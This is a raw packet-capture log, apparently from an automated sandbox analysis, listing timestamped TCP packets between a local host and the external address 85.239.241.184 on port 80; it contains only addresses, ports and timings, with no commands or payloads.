Sep 6, 2024 11:26:05.316806078 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316806078 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.316817045 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316828012 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.316828012 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316839933 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316859007 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.316865921 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.316874027 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316884995 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316894054 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316905022 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316914082 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316915989 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.316925049 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316934109 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.316937923 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316947937 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316957951 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316961050 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.316967964 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316977978 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316987038 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.316998005 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.317336082 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.317351103 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.317372084 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.320594072 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.320640087 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.320713997 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.321666956 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.321676970 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.321685076 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.321695089 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.321705103 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.321706057 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.321713924 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.321727991 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.321732998 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.321753979 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.322563887 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.327366114 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327375889 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327384949 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327414989 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.327430010 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327440023 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327447891 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327457905 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327470064 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.327491999 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.327547073 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327558041 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327567101 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327575922 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327585936 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327590942 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.327596903 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327605963 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327614069 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.327616930 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327626944 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327636003 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327636003 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.327646017 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327656984 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.327676058 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.327696085 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327704906 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327713966 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327723980 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327734947 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327735901 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.327740908 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327750921 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327760935 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.327784061 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.327841043 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327852011 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327861071 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327869892 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327886105 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327888966 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.327896118 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327899933 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.327905893 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327915907 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327924967 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327927113 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.327934027 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327943087 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327950001 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.327951908 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327956915 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.327961922 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327972889 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327980995 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.327989101 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.328000069 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.402477026 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.402494907 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.402510881 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.402522087 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.402530909 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.402542114 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.402543068 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.402553082 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.402563095 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.402564049 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.402575970 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.402587891 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.402596951 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.402607918 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.402620077 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.402622938 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.402635098 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.402642965 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.402645111 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.402657986 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.402667999 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.402667999 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.402689934 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.402719975 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.402743101 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.402754068 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.402764082 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.402785063 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.402812958 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.402822971 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.402832985 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.402844906 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.402856112 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.402880907 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.402955055 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.402966976 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.402977943 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403028965 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.403042078 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403052092 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403062105 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403086901 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.403135061 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403145075 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403155088 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403173923 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403181076 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.403183937 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403193951 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403211117 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403217077 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.403223038 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403233051 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403254986 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.403404951 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403414965 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403424025 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403446913 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403450966 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.403458118 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403467894 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403484106 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403486013 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.403523922 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.403552055 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403562069 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403572083 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403582096 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403593063 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403597116 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.403601885 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403615952 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.403626919 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.403852940 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403862953 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403872013 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403882980 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403892040 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403898001 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.403903008 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403913021 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.403935909 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.403939962 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403954983 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403964996 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403981924 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.403981924 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.403995037 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.404006004 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.404016972 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.404022932 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.404026985 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.404045105 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.404207945 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.404220104 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.404231071 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.404252052 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.404282093 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.404294968 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.404304028 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.404315948 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.404324055 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.404360056 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.404422045 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.404433012 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.404442072 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.404453039 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.404463053 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.404468060 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.404475927 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.404479027 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.404495001 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.404505014 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.404515982 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.404516935 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.404525995 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.404536009 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.404537916 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.404546976 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.404548883 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.404556990 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.404567957 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.404578924 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.404594898 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.404634953 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.404853106 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.404864073 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.404872894 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.404901028 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.404997110 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.405008078 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.405018091 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.405028105 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.405035973 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.405040026 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.405050039 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.405061007 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.405071974 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.405102968 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.405102968 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.405172110 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.405188084 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.405200005 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.405215025 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.405234098 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.405262947 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.405273914 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.405282974 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.405297041 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.405303955 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.405335903 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.405332088 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.405345917 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.405355930 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.405368090 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.405373096 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.405380011 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.405391932 CEST  80  49163  85.239.241.184  192.168.2.22
                          Sep 6, 2024 11:26:05.405407906 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.405545950 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.405589104 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.489339113 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489422083 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489437103 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489448071 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489464998 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489470959 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.489476919 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489487886 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489497900 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489495039 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.489511013 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.489516020 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489526987 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489528894 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.489537001 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489542007 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489552975 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489563942 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489568949 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.489574909 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489597082 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.489629984 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489670038 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.489689112 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489698887 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489729881 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.489773989 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489784956 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489814997 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.489886999 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489897013 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489906073 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489916086 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489924908 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.489933014 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489943027 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489948034 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.489953041 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489964008 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489968061 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.489974022 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489985943 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.489991903 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.490017891 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.490047932 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490058899 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490068913 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490089893 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.490123034 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490134001 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490149021 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490164995 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.490236044 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490247011 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490257025 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490272999 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.490307093 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490317106 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490325928 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490336895 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490345955 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490346909 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.490364075 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.490461111 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490472078 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490480900 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490499973 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.490521908 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490533113 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490544081 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490556002 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490556955 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.490597010 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.490622044 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490633965 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490643978 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490653992 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490664959 CEST4916380192.168.2.2285.239.241.184
